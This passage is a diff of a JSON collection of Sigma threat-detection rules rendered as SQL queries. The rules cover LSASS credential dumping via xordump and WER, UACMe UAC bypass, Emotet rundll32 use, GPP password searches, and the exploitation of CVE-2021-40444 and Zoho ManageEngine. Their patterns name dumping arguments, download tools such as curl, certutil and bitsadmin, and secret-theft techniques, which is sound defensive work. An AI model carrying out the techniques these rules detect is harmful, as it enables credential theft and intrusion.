LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", "status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" @@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", @@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\clr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscoree.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mscorlib.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential Wazuh Security Platform DLL Sideloading", - "id": "db77ce78-7e28-4188-9337-cf30e2b3ba9f", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of the Wazuh security platform", - "author": "X__Junior", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\libwazuhshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\libwinpthread-1.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\ossec-agent\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Inkscape\\\\bin\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Pidgin\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_wazuh.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "APT PRIVATELOG Image Load Pattern", - "id": "33a2d1dd-f3b0-40bd-8baf-7974468927cc", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances", - "author": "Florian Roth (Nextron Systems)", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Rarely observed" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\clfsw32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_usp_svchost_clfsw32.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "Abusing Azure Browser SSO", - "id": "50f852e6-af22-4c78-9ede-42ef36aa3453", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", "status": "test", - "description": "Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account)\nwanting to perform SSO authentication in the browser.\nAn attacker can use this to authenticate to Azure AD in a browser as that user.\n", - "author": "Den Iuzvyk", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", + "attack.execution", + "attack.t1203", "attack.privilege_escalation", - "attack.t1574.002" + "attack.t1068" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%MicrosoftAccountTokenProvider.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\BackgroundTaskHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\OneDrive.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName = ''))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_abusing_azure_browser_sso.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "DLL Loaded From Suspicious Location Via Cmspt.EXE", - "id": "75e508f7-932d-4ebc-af77-269237a84ce1", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Users\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\') AND (ImageLoaded LIKE '%.dll' ESCAPE '\\' OR ImageLoaded LIKE '%.ocx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_cmstp_load_dll_from_susp_location.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE", - "id": "ec8c4047-fad9-416a-8c81-0f479353d7f6", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the \"sdiageng.dll\" library", - "author": "Greg (rule)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1202", - "cve.2022.30190" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\sdiageng.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_sdiageng_load_by_msdt.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", - "id": "6b98b92b-4f00-4f62-b4fe-4d1920215771", - "status": "experimental", - "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", + "status": "test", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_side_load_non_existent_dlls.yml" + "filename": 